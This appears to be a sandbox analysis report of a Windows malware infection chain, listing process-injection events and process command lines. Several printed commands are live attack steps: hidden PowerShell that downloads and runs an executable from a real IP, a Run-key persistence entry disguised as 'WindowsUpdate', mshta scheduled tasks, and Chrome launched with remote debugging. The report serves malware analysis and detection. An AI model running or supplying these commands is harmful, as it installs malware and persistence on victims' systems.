PID 2984 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 2984 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 2984 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 2984 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 2984 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 2192 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe
PID 2192 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe
PID 2192 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe
PID 2192 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe
PID 900 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
PID 900 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
PID 900 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
PID 900 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
PID 944 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe C:\Windows\SysWOW64\cmd.exe
PID 944 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe C:\Windows\SysWOW64\cmd.exe
PID 944 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe C:\Windows\SysWOW64\cmd.exe
PID 944 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe C:\Windows\SysWOW64\cmd.exe
PID 944 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe C:\Windows\SysWOW64\cmd.exe
PID 2984 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe
PID 2984 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe
PID 2984 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe
PID 2984 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe
PID 2984 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe
PID 2984 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe
PID 2984 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe
PID 2984 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe
PID 2984 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 2984 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 2984 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 2984 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 1640 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 1640 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 1640 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 1272 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
PID 1272 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
PID 1272 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
PID 1272 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
PID 1272 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
PID 1272 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
PID 2732 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2732 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2732 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2732 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe
PID 2984 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe
PID 2984 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe
PID 2984 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe

"C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"

C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe

"C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe"

C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe

C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe

"C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe"

C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe

"C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe"

C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 500

C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe

C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1036

C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe"

C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe

"C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe"

C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe

C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe

C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1692 -s 500

C:\Users\Admin\AppData\Local\Temp\10057930101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10057930101\FvbuInU.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef79b9758,0x7fef79b9768,0x7fef79b9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2360 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2368 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1368 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1296 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10059480101\1ZXaFij.exe

"C:\Users\Admin\AppData\Local\Temp\10059480101\1ZXaFij.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3492 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3612 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10059490101\1ZXaFij.exe

"C:\Users\Admin\AppData\Local\Temp\10059490101\1ZXaFij.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3760 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jvytlqfl.cmdline"

C:\Users\Admin\AppData\Local\Temp\10059590101\Gidqgok.exe

"C:\Users\Admin\AppData\Local\Temp\10059590101\Gidqgok.exe"

C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe

C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50A1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC50A0.tmp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 552 -s 1216

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2zer-yl.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A80.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5A7F.tmp"

C:\Users\Admin\AppData\Local\Temp\10059600101\Gidqgok.exe

"C:\Users\Admin\AppData\Local\Temp\10059600101\Gidqgok.exe"

C:\Users\Admin\AppData\Local\Temp\10061070101\bwuGbC2.exe

"C:\Users\Admin\AppData\Local\Temp\10061070101\bwuGbC2.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10061080101\bwuGbC2.exe

"C:\Users\Admin\AppData\Local\Temp\10061080101\bwuGbC2.exe"

C:\Users\Admin\AppData\Local\Temp\10000490101\netdriver.exe

"C:\Users\Admin\AppData\Local\Temp\10000490101\netdriver.exe"

C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe

"C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe"

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe

C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe

"C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe"

C:\Users\Admin\AppData\Local\Temp\10062570101\b6d1c8e25e.exe

"C:\Users\Admin\AppData\Local\Temp\10062570101\b6d1c8e25e.exe"

C:\Users\Admin\AppData\Local\Temp\10062720101\7ee58999f0.exe

"C:\Users\Admin\AppData\Local\Temp\10062720101\7ee58999f0.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn Me3u4ma006G /tr "mshta C:\Users\Admin\AppData\Local\Temp\1Y5lWQwsW.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\1Y5lWQwsW.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn Me3u4ma006G /tr "mshta C:\Users\Admin\AppData\Local\Temp\1Y5lWQwsW.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BGOCQVVKCX0QWYVMYADESIX7SF6FWWAB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "fEiHYmaxCUY" /tr "mshta \"C:\Temp\r2EtpuBU9.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe

"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\r2EtpuBU9.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe

"C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe"

C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe

"C:/Users/Admin/AppData/Roaming/winsvcs/WindowsPrinterService.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {9A18A70E-EF90-4148-9E14-42DC99609553} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]

C:\ProgramData\nlfqre\ssomfop.exe

C:\ProgramData\nlfqre\ssomfop.exe

C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe

"C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe"

C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe

"C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 508

C:\Users\Admin\AppData\Local\Temp\10062900101\aa27374f64.exe

"C:\Users\Admin\AppData\Local\Temp\10062900101\aa27374f64.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6ba9758,0x7fef6ba9768,0x7fef6ba9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1412 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:8

